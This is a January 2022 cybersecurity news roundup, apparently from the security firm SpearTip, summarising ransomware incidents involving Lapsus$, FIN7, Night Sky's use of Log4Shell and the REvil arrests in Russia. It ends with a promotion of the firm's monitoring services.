Christopher Eaton | January 14th, 2022

Emerging Lapsus$ Ransomware Extorts Portugal’s Largest Media Conglomerate After Accessing Its AWS Account

Portugal-based media giant Impresa, owner of the nation’s largest newspaper and television station, was attacked by the Lapsus$ ransomware group. The attack was widely known as Lapsus$ replaced all Impresa websites with a ransom note. Lapsus$ then harassed its victim from Impresa-owned Expresso’s Twitter account indicating that the ransomware group maintained access to business-critical information despite restoration of some of the previously affected services. No information regarding a ransom payment or the nature of the compromised data has been publicized. 

 Maryland Health Department Attacked by Ransomware Preventing Health Workers from Accessing Critical Systems

According to the Chief Information Security Officer (CISO) of the state of Maryland, critical infrastructure in its health department was attacked by ransomware. As a result of this attack, many patients’ health records, treatment plans, and banking information were rendered inaccessible meaning some people are receiving sub-optimal care and hospitals were not compensated for treatment. State officials have made assurances that all state-operated systems and state-issued hardware will be replaced or restored for safe use. Additionally, Maryland’s CISO said that the state would not pay the ransom demand. It is unclear precisely what and how much data was encrypted or exfiltrated, or when the state’s health system will be fully restored. 

 FIN7 Ransomware Group Is Mailing USB Devices Loaded with Ransomware to Critical Infrastructure Operations 

A recent FBI report warned FIN7 ransomware group, also known as Carbanak or Navigator, is actively distributing ransomware poisoned USB drives through the mail system in specially designed gift boxes. The USB sticks are designed to appear as official mailings from the U.S. Department of Health and Human Services or Amazon. The FBI has further indicated that infected devices are being sent primarily to organizations in the transportation, insurance, and defense industries. Threat actors hope that a recipient of the drives will plug it into their computer, infect the network systems with malware, and set the stage for future ransomware attacks. It is unclear if or how often the infected USB drives have been installed. 

 New Ransomware, Night Sky, Targeting Corporate Networks Using Log4j Vulnerability

Night Sky ransomware is customized to contain a personalized ransom note and hardcoded login information to access the victim’s negotiation page. When the ransomware is launched, it will encrypt all files except those that end with the “.dll” or “.exe” extensions, but will not encrypt a plethora of files or folders. Night Sky has recently exploited the critical CVE-2021-44228 vulnerability in the Log4j logging library, or Log4Shell, gaining access to VMware Horizon systems. Using this exploit, threat actors, including Night Sky operators, are targeting vulnerable machines exposed on the public web from domains impersonating legitimate companies from technology and cybersecurity sectors. 

Ransomware Group REvil, Responsible for the Breach on Kaseya, Taken Down by Russian Authorities at U.S. Request

At the request of United States officials, government agents for Russia’s Federal Security Service (FSB) conducted a raid against REvil, the notorious ransomware group. REvil gained international attention after claiming responsibility for attacking companies using Kaseya VSA remote management software and locking down millions of devices; they were also behind the attack on JBS, the world’s largest meat processor. Reports indicate that the raid netted 14 people, millions of dollars worth of cash and other assets, as well as a cache of computer equipment. The FSB has indicated that the US government has been notified of the raid against the REvil ransomware group.

 

Every indicator points to an increase of ransomware attacks in 2022, further exposing business-critical and PII that can bring tremendous devastation to all affected. While there are a multitude of ways to enhance security today—MFA, strong passwords, spear-phishing education—and limit one’s likelihood of being victimized, threat actors continue to find ways to impact individuals and businesses. At SpearTip, we recognize the ever-changing nature of the threat landscape and have the best formula to stay protected against the latest ransomware. Our team of certified engineers continuously monitor all partner endpoints from our 24/7 Security Operations Centers using our ShadowSpear Platform, an unparalleled toolset providing advanced network visibility, threat detection, and immediate threat isolation. 

 If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.